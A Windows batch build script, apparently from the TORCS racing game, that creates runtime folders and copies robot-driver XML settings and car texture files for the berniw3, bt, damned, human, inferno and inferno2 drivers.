if exist .\src\drivers\berniw3\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\berniw3\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\berniw3\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\berniw3
if exist .\src\drivers\berniw3\berniw3.xml copy .\src\drivers\berniw3\berniw3.xml .\%RUNTIMEDIR%\drivers\berniw3\berniw3.xml
if exist .\src\drivers\berniw3\logo.rgb copy .\src\drivers\berniw3\logo.rgb .\%RUNTIMEDIR%\drivers\berniw3\logo.rgb
if exist .\src\drivers\bt\0\practice\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\bt\0\practice\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\bt\0\practice\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\bt
if exist .\src\drivers\bt\0\practice\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\bt\0
if exist .\src\drivers\bt\0\practice\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\bt\0\practice
if exist .\src\drivers\bt\0\qualifying\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\bt\0\qualifying\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\bt\0\qualifying\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\bt
if exist .\src\drivers\bt\0\qualifying\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\bt\0
if exist .\src\drivers\bt\0\qualifying\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\bt\0\qualifying
if exist .\src\drivers\bt\0\race\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\bt\0\race\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\bt\0\race\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\bt
if exist .\src\drivers\bt\0\race\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\bt\0
if exist .\src\drivers\bt\0\race\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\bt\0\race
if exist .\src\drivers\bt\0\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\bt\0\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\bt\0\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\bt
if exist .\src\drivers\bt\0\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\bt\0
if exist .\src\drivers\bt\0\default.xml copy .\src\drivers\bt\0\default.xml .\%RUNTIMEDIR%\drivers\bt\0\default.xml
if exist .\src\drivers\bt\0\car1-stock1.rgb copy .\src\drivers\bt\0\car1-stock1.rgb .\%RUNTIMEDIR%\drivers\bt\0\car1-stock1.rgb
if exist .\src\drivers\bt\1\practice\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\bt\1\practice\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\bt\1\practice\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\bt
if exist .\src\drivers\bt\1\practice\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\bt\1
if exist .\src\drivers\bt\1\practice\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\bt\1\practice
if exist .\src\drivers\bt\1\qualifying\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\bt\1\qualifying\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\bt\1\qualifying\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\bt
if exist .\src\drivers\bt\1\qualifying\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\bt\1
if exist .\src\drivers\bt\1\qualifying\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\bt\1\qualifying
if exist .\src\drivers\bt\1\race\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\bt\1\race\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\bt\1\race\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\bt
if exist .\src\drivers\bt\1\race\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\bt\1
if exist .\src\drivers\bt\1\race\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\bt\1\race
if exist .\src\drivers\bt\1\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\bt\1\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\bt\1\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\bt
if exist .\src\drivers\bt\1\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\bt\1
if exist .\src\drivers\bt\1\default.xml copy .\src\drivers\bt\1\default.xml .\%RUNTIMEDIR%\drivers\bt\1\default.xml
if exist .\src\drivers\bt\1\car1-stock1.rgb copy .\src\drivers\bt\1\car1-stock1.rgb .\%RUNTIMEDIR%\drivers\bt\1\car1-stock1.rgb
if exist .\src\drivers\bt\2\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\bt\2\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\bt\2\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\bt
if exist .\src\drivers\bt\2\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\bt\2
if exist .\src\drivers\bt\2\default.xml copy .\src\drivers\bt\2\default.xml .\%RUNTIMEDIR%\drivers\bt\2\default.xml
if exist .\src\drivers\bt\2\car1-trb1.rgb copy .\src\drivers\bt\2\car1-trb1.rgb .\%RUNTIMEDIR%\drivers\bt\2\car1-trb1.rgb
if exist .\src\drivers\bt\3\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\bt\3\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\bt\3\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\bt
if exist .\src\drivers\bt\3\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\bt\3
if exist .\src\drivers\bt\3\default.xml copy .\src\drivers\bt\3\default.xml .\%RUNTIMEDIR%\drivers\bt\3\default.xml
if exist .\src\drivers\bt\3\car2-trb1.rgb copy .\src\drivers\bt\3\car2-trb1.rgb .\%RUNTIMEDIR%\drivers\bt\3\car2-trb1.rgb
if exist .\src\drivers\bt\4\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\bt\4\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\bt\4\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\bt
if exist .\src\drivers\bt\4\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\bt\4
if exist .\src\drivers\bt\4\default.xml copy .\src\drivers\bt\4\default.xml .\%RUNTIMEDIR%\drivers\bt\4\default.xml
if exist .\src\drivers\bt\4\car3-trb1.rgb copy .\src\drivers\bt\4\car3-trb1.rgb .\%RUNTIMEDIR%\drivers\bt\4\car3-trb1.rgb
if exist .\src\drivers\bt\5\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\bt\5\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\bt\5\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\bt
if exist .\src\drivers\bt\5\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\bt\5
if exist .\src\drivers\bt\5\default.xml copy .\src\drivers\bt\5\default.xml .\%RUNTIMEDIR%\drivers\bt\5\default.xml
if exist .\src\drivers\bt\5\car4-trb1.rgb copy .\src\drivers\bt\5\car4-trb1.rgb .\%RUNTIMEDIR%\drivers\bt\5\car4-trb1.rgb
if exist .\src\drivers\bt\6\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\bt\6\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\bt\6\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\bt
if exist .\src\drivers\bt\6\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\bt\6
if exist .\src\drivers\bt\6\default.xml copy .\src\drivers\bt\6\default.xml .\%RUNTIMEDIR%\drivers\bt\6\default.xml
if exist .\src\drivers\bt\6\car5-trb1.rgb copy .\src\drivers\bt\6\car5-trb1.rgb .\%RUNTIMEDIR%\drivers\bt\6\car5-trb1.rgb
if exist .\src\drivers\bt\7\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\bt\7\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\bt\7\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\bt
if exist .\src\drivers\bt\7\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\bt\7
if exist .\src\drivers\bt\7\default.xml copy .\src\drivers\bt\7\default.xml .\%RUNTIMEDIR%\drivers\bt\7\default.xml
if exist .\src\drivers\bt\7\car6-trb1.rgb copy .\src\drivers\bt\7\car6-trb1.rgb .\%RUNTIMEDIR%\drivers\bt\7\car6-trb1.rgb
if exist .\src\drivers\bt\8\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\bt\8\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\bt\8\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\bt
if exist .\src\drivers\bt\8\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\bt\8
if exist .\src\drivers\bt\8\default.xml copy .\src\drivers\bt\8\default.xml .\%RUNTIMEDIR%\drivers\bt\8\default.xml
if exist .\src\drivers\bt\8\car7-trb1.rgb copy .\src\drivers\bt\8\car7-trb1.rgb .\%RUNTIMEDIR%\drivers\bt\8\car7-trb1.rgb
if exist .\src\drivers\bt\9\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\bt\9\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\bt\9\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\bt
if exist .\src\drivers\bt\9\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\bt\9
if exist .\src\drivers\bt\9\default.xml copy .\src\drivers\bt\9\default.xml .\%RUNTIMEDIR%\drivers\bt\9\default.xml
if exist .\src\drivers\bt\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\bt\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\bt\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\bt
if exist .\src\drivers\bt\bt.xml copy .\src\drivers\bt\bt.xml .\%RUNTIMEDIR%\drivers\bt\bt.xml
if exist .\src\drivers\bt\logo.rgb copy .\src\drivers\bt\logo.rgb .\%RUNTIMEDIR%\drivers\bt\logo.rgb
if exist .\src\drivers\damned\0\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\damned\0\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\damned\0\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\damned
if exist .\src\drivers\damned\0\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\damned\0
if exist .\src\drivers\damned\0\default.xml copy .\src\drivers\damned\0\default.xml .\%RUNTIMEDIR%\drivers\damned\0\default.xml
if exist .\src\drivers\damned\1\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\damned\1\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\damned\1\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\damned
if exist .\src\drivers\damned\1\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\damned\1
if exist .\src\drivers\damned\1\default.xml copy .\src\drivers\damned\1\default.xml .\%RUNTIMEDIR%\drivers\damned\1\default.xml
if exist .\src\drivers\damned\2\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\damned\2\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\damned\2\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\damned
if exist .\src\drivers\damned\2\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\damned\2
if exist .\src\drivers\damned\2\default.xml copy .\src\drivers\damned\2\default.xml .\%RUNTIMEDIR%\drivers\damned\2\default.xml
if exist .\src\drivers\damned\3\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\damned\3\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\damned\3\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\damned
if exist .\src\drivers\damned\3\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\damned\3
if exist .\src\drivers\damned\3\default.xml copy .\src\drivers\damned\3\default.xml .\%RUNTIMEDIR%\drivers\damned\3\default.xml
if exist .\src\drivers\damned\4\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\damned\4\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\damned\4\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\damned
if exist .\src\drivers\damned\4\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\damned\4
if exist .\src\drivers\damned\4\default.xml copy .\src\drivers\damned\4\default.xml .\%RUNTIMEDIR%\drivers\damned\4\default.xml
if exist .\src\drivers\damned\5\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\damned\5\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\damned\5\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\damned
if exist .\src\drivers\damned\5\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\damned\5
if exist .\src\drivers\damned\5\default.xml copy .\src\drivers\damned\5\default.xml .\%RUNTIMEDIR%\drivers\damned\5\default.xml
if exist .\src\drivers\damned\6\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\damned\6\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\damned\6\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\damned
if exist .\src\drivers\damned\6\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\damned\6
if exist .\src\drivers\damned\6\default.xml copy .\src\drivers\damned\6\default.xml .\%RUNTIMEDIR%\drivers\damned\6\default.xml
if exist .\src\drivers\damned\6\car5-trb1.rgb copy .\src\drivers\damned\6\car5-trb1.rgb .\%RUNTIMEDIR%\drivers\damned\6\car5-trb1.rgb
if exist .\src\drivers\damned\7\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\damned\7\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\damned\7\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\damned
if exist .\src\drivers\damned\7\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\damned\7
if exist .\src\drivers\damned\7\default.xml copy .\src\drivers\damned\7\default.xml .\%RUNTIMEDIR%\drivers\damned\7\default.xml
if exist .\src\drivers\damned\7\car6-trb1.rgb copy .\src\drivers\damned\7\car6-trb1.rgb .\%RUNTIMEDIR%\drivers\damned\7\car6-trb1.rgb
if exist .\src\drivers\damned\8\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\damned\8\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\damned\8\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\damned
if exist .\src\drivers\damned\8\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\damned\8
if exist .\src\drivers\damned\8\default.xml copy .\src\drivers\damned\8\default.xml .\%RUNTIMEDIR%\drivers\damned\8\default.xml
if exist .\src\drivers\damned\8\car7-trb1.rgb copy .\src\drivers\damned\8\car7-trb1.rgb .\%RUNTIMEDIR%\drivers\damned\8\car7-trb1.rgb
if exist .\src\drivers\damned\9\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\damned\9\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\damned\9\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\damned
if exist .\src\drivers\damned\9\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\damned\9
if exist .\src\drivers\damned\9\default.xml copy .\src\drivers\damned\9\default.xml .\%RUNTIMEDIR%\drivers\damned\9\default.xml
if exist .\src\drivers\damned\9\car1-trb3.rgb copy .\src\drivers\damned\9\car1-trb3.rgb .\%RUNTIMEDIR%\drivers\damned\9\car1-trb3.rgb
if exist .\src\drivers\damned\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\damned\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\damned\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\damned
if exist .\src\drivers\damned\damned.xml copy .\src\drivers\damned\damned.xml .\%RUNTIMEDIR%\drivers\damned\damned.xml
if exist .\src\drivers\damned\logo.rgb copy .\src\drivers\damned\logo.rgb .\%RUNTIMEDIR%\drivers\damned\logo.rgb
if exist .\src\drivers\human\tracks\b-speedway\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\human\tracks\b-speedway\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\human\tracks\b-speedway\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\human
if exist .\src\drivers\human\tracks\b-speedway\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\human\tracks
if exist .\src\drivers\human\tracks\b-speedway\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\human\tracks\b-speedway
if exist .\src\drivers\human\tracks\b-speedway\car-porsche-gt1.xml copy .\src\drivers\human\tracks\b-speedway\car-porsche-gt1.xml .\%RUNTIMEDIR%\drivers\human\tracks\b-speedway\car-porsche-gt1.xml
if exist .\src\drivers\human\tracks\dirt-1\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\human\tracks\dirt-1\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\human\tracks\dirt-1\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\human
if exist .\src\drivers\human\tracks\dirt-1\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\human\tracks
if exist .\src\drivers\human\tracks\dirt-1\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\human\tracks\dirt-1
if exist .\src\drivers\human\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\human\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\human\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\human
if exist .\src\drivers\human\car.xml copy .\src\drivers\human\car.xml .\%RUNTIMEDIR%\drivers\human\car.xml
if exist .\src\drivers\human\human.xml copy .\src\drivers\human\human.xml .\%RUNTIMEDIR%\drivers\human\human.xml
if exist .\src\drivers\human\preferences.xml copy .\src\drivers\human\preferences.xml .\%RUNTIMEDIR%\drivers\human\preferences.xml
if exist .\src\drivers\human\logo.rgb copy .\src\drivers\human\logo.rgb .\%RUNTIMEDIR%\drivers\human\logo.rgb
if exist .\src\drivers\inferno\1\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\inferno\1\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\inferno\1\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\inferno
if exist .\src\drivers\inferno\1\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\inferno\1
if exist .\src\drivers\inferno\1\default.xml copy .\src\drivers\inferno\1\default.xml .\%RUNTIMEDIR%\drivers\inferno\1\default.xml
if exist .\src\drivers\inferno\10\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\inferno\10\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\inferno\10\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\inferno
if exist .\src\drivers\inferno\10\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\inferno\10
if exist .\src\drivers\inferno\10\default.xml copy .\src\drivers\inferno\10\default.xml .\%RUNTIMEDIR%\drivers\inferno\10\default.xml
if exist .\src\drivers\inferno\10\car1-trb3.rgb copy .\src\drivers\inferno\10\car1-trb3.rgb .\%RUNTIMEDIR%\drivers\inferno\10\car1-trb3.rgb
if exist .\src\drivers\inferno\2\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\inferno\2\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\inferno\2\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\inferno
if exist .\src\drivers\inferno\2\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\inferno\2
if exist .\src\drivers\inferno\2\default.xml copy .\src\drivers\inferno\2\default.xml .\%RUNTIMEDIR%\drivers\inferno\2\default.xml
if exist .\src\drivers\inferno\2\p406.rgb copy .\src\drivers\inferno\2\p406.rgb .\%RUNTIMEDIR%\drivers\inferno\2\p406.rgb
if exist .\src\drivers\inferno\3\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\inferno\3\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\inferno\3\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\inferno
if exist .\src\drivers\inferno\3\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\inferno\3
if exist .\src\drivers\inferno\3\default.xml copy .\src\drivers\inferno\3\default.xml .\%RUNTIMEDIR%\drivers\inferno\3\default.xml
if exist .\src\drivers\inferno\3\car1-trb1.rgb copy .\src\drivers\inferno\3\car1-trb1.rgb .\%RUNTIMEDIR%\drivers\inferno\3\car1-trb1.rgb
if exist .\src\drivers\inferno\4\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\inferno\4\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\inferno\4\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\inferno
if exist .\src\drivers\inferno\4\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\inferno\4
if exist .\src\drivers\inferno\4\default.xml copy .\src\drivers\inferno\4\default.xml .\%RUNTIMEDIR%\drivers\inferno\4\default.xml
if exist .\src\drivers\inferno\4\car2-trb1.rgb copy .\src\drivers\inferno\4\car2-trb1.rgb .\%RUNTIMEDIR%\drivers\inferno\4\car2-trb1.rgb
if exist .\src\drivers\inferno\5\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\inferno\5\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\inferno\5\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\inferno
if exist .\src\drivers\inferno\5\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\inferno\5
if exist .\src\drivers\inferno\5\default.xml copy .\src\drivers\inferno\5\default.xml .\%RUNTIMEDIR%\drivers\inferno\5\default.xml
if exist .\src\drivers\inferno\5\car3-trb1.rgb copy .\src\drivers\inferno\5\car3-trb1.rgb .\%RUNTIMEDIR%\drivers\inferno\5\car3-trb1.rgb
if exist .\src\drivers\inferno\6\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\inferno\6\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\inferno\6\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\inferno
if exist .\src\drivers\inferno\6\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\inferno\6
if exist .\src\drivers\inferno\6\default.xml copy .\src\drivers\inferno\6\default.xml .\%RUNTIMEDIR%\drivers\inferno\6\default.xml
if exist .\src\drivers\inferno\6\car4-trb1.rgb copy .\src\drivers\inferno\6\car4-trb1.rgb .\%RUNTIMEDIR%\drivers\inferno\6\car4-trb1.rgb
if exist .\src\drivers\inferno\7\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\inferno\7\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\inferno\7\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\inferno
if exist .\src\drivers\inferno\7\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\inferno\7
if exist .\src\drivers\inferno\7\default.xml copy .\src\drivers\inferno\7\default.xml .\%RUNTIMEDIR%\drivers\inferno\7\default.xml
if exist .\src\drivers\inferno\7\car5-trb1.rgb copy .\src\drivers\inferno\7\car5-trb1.rgb .\%RUNTIMEDIR%\drivers\inferno\7\car5-trb1.rgb
if exist .\src\drivers\inferno\8\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\inferno\8\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\inferno\8\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\inferno
if exist .\src\drivers\inferno\8\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\inferno\8
if exist .\src\drivers\inferno\8\default.xml copy .\src\drivers\inferno\8\default.xml .\%RUNTIMEDIR%\drivers\inferno\8\default.xml
if exist .\src\drivers\inferno\8\car6-trb1.rgb copy .\src\drivers\inferno\8\car6-trb1.rgb .\%RUNTIMEDIR%\drivers\inferno\8\car6-trb1.rgb
if exist .\src\drivers\inferno\9\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\inferno\9\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\inferno\9\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\inferno
if exist .\src\drivers\inferno\9\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\inferno\9
if exist .\src\drivers\inferno\9\default.xml copy .\src\drivers\inferno\9\default.xml .\%RUNTIMEDIR%\drivers\inferno\9\default.xml
if exist .\src\drivers\inferno\9\car7-trb1.rgb copy .\src\drivers\inferno\9\car7-trb1.rgb .\%RUNTIMEDIR%\drivers\inferno\9\car7-trb1.rgb
if exist .\src\drivers\inferno\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\inferno\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\inferno\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\inferno
if exist .\src\drivers\inferno\inferno.xml copy .\src\drivers\inferno\inferno.xml .\%RUNTIMEDIR%\drivers\inferno\inferno.xml
if exist .\src\drivers\inferno\logo.rgb copy .\src\drivers\inferno\logo.rgb .\%RUNTIMEDIR%\drivers\inferno\logo.rgb
if exist .\src\drivers\inferno2\1\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\inferno2\1\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\inferno2\1\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\inferno2
if exist .\src\drivers\inferno2\1\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\inferno2\1
if exist .\src\drivers\inferno2\1\defaultcar.xml copy .\src\drivers\inferno2\1\defaultcar.xml .\%RUNTIMEDIR%\drivers\inferno2\1\defaultcar.xml
if exist .\src\drivers\inferno2\1\default.xml copy .\src\drivers\inferno2\1\default.xml .\%RUNTIMEDIR%\drivers\inferno2\1\default.xml
if exist .\src\drivers\inferno2\10\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\inferno2\10\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\inferno2\10\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\inferno2
if exist .\src\drivers\inferno2\10\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\inferno2\10
if exist .\src\drivers\inferno2\10\defaultcar.xml copy .\src\drivers\inferno2\10\defaultcar.xml .\%RUNTIMEDIR%\drivers\inferno2\10\defaultcar.xml
if exist .\src\drivers\inferno2\10\default.xml copy .\src\drivers\inferno2\10\default.xml .\%RUNTIMEDIR%\drivers\inferno2\10\default.xml
if exist .\src\drivers\inferno2\2\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\inferno2\2\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\inferno2\2\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\inferno2
if exist .\src\drivers\inferno2\2\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\inferno2\2
if exist .\src\drivers\inferno2\2\defaultcar.xml copy .\src\drivers\inferno2\2\defaultcar.xml .\%RUNTIMEDIR%\drivers\inferno2\2\defaultcar.xml
if exist .\src\drivers\inferno2\2\default.xml copy .\src\drivers\inferno2\2\default.xml .\%RUNTIMEDIR%\drivers\inferno2\2\default.xml
if exist .\src\drivers\inferno2\3\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\inferno2\3\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\inferno2\3\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\inferno2
if exist .\src\drivers\inferno2\3\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\inferno2\3
if exist .\src\drivers\inferno2\3\defaultcar.xml copy .\src\drivers\inferno2\3\defaultcar.xml .\%RUNTIMEDIR%\drivers\inferno2\3\defaultcar.xml
if exist .\src\drivers\inferno2\3\default.xml copy .\src\drivers\inferno2\3\default.xml .\%RUNTIMEDIR%\drivers\inferno2\3\default.xml
if exist .\src\drivers\inferno2\4\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\inferno2\4\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\inferno2\4\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\inferno2
if exist .\src\drivers\inferno2\4\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\inferno2\4
if exist .\src\drivers\inferno2\4\defaultcar.xml copy .\src\drivers\inferno2\4\defaultcar.xml .\%RUNTIMEDIR%\drivers\inferno2\4\defaultcar.xml
if exist .\src\drivers\inferno2\4\default.xml copy .\src\drivers\inferno2\4\default.xml .\%RUNTIMEDIR%\drivers\inferno2\4\default.xml
